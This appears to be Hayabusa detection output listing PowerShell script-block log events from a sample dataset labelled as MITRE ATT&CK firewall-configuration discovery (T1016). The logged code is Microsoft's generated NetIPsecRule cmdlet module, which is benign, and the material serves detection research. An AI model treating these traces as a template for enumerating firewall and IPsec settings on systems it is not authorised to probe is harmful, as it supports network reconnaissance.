[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemoteAddress'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Protocol')) { [object]$__cmdletization_value = ${Protocol} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Protocol'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalPort')) { [object]$__cmdletization_value = ${LocalPort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'LocalPort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemotePort')) { [object]$__cmdletization_value = ${RemotePort} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RemotePort'; ParameterType = 'System.UInt16'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'CmdletOutput'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'Out'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Find', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Find-NetIPsecRule' function Get-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, Value",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"FromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) {",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecRule' function Set-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByIPsecRuleName')] 